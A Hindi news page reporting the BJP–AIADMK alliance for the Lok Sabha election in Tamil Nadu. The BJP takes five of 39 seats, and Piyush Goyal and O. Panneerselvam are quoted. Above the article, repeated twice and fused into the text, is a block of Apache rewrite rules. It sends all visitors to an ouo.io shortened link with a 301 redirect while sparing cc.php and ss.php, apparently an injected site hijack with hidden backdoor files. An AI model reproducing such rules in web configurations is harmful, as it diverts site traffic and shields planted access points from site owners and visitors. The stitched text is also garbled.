
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 433
Previous Next। लोकसभा चुनाव से ठीक पहले भारतीय जनता पार्टी (भाजपा) ने महाराष्ट्र के बाद एक और अहम राज्य तमिलनाडु में गठबंधन का ऐलान कर दिया है। भारतीय जनता पार्टी (भाजपा) तमिलनाडु में सत्तारूढ़ अखिल भारतीय अन्ना द्रविड़ मुनेत्र कड़गम (अन्ना द्रमुक) के साथ गठबंधन के तहत यहां की 39 लोकसभा सीटों में से पांच पर चुनाव लड़ेगी। उपमुख्यमंत्री ओ. पन्नीरसेल्वम ने मंगलवार को इसकी घोषणा की।
दोनों दलों ने एक साथ मिलकर चुनाव लड़ने का फैसला किया है। गठबंधन के ऐलान के बाद बीजेपी नेता पीयूष गोयल ने कहा कि 21 विधानसभा के उपचुनाव में बीजेपी एआईएडीएमके उम्मीदवारों का समर्थन करेगी। तमिलनाडु के डिप्टी सीएम पन्नीरसेल्वम ने कहा कि बीजेपी लोकसभा की पांच सीटों पर चुनाव लड़ेगी। इसके साथ ही दोनों दल तमिलनाडु और पुडुचेरी में एक साथ मिलकर चुनाव लडे़ंगे। बीजेपी के नेता पीयूष गोयल ने कहा कि तमिलनाडु में बीजेपी और एआईएडीएमके एक साथ मिलकर इतिहास रच चुके हैं। और एक बार फिर हम इस चुनाव में बेहतर करेंगे।
पीयूष गोयल ने कहा कि आज देश में नकारात्मक राजनीति का वातावरण बनाया गया है। लेकिन एक बात साफ है कि देश की जनता का भरोसा पीएम नरेंद्र मोदी में बरकरार है। उन्होंने कहा कि राज्य में एआईएडीएमके के नेतृत्व में हम लोग जनता के बीच जाएंगे जबकि केंद्र की लड़ाई में हमारा चेहरा पीएम नरेंद्र होंगे।
बता दें, तमिलनाडु में लोकसभा की कुल 39 सीटें हैं। 2014 के आम चुनाव में एआईएडीएमके को जबरदस्त जीत हासिल हुई थी। एआईएडीएमके को कुल 37 सीटों पर जीत दर्ज की थी। पीएमके के खाते में 1 सीट और बीजेपी का पहली बार एक सीट के साथ खाता खुला था।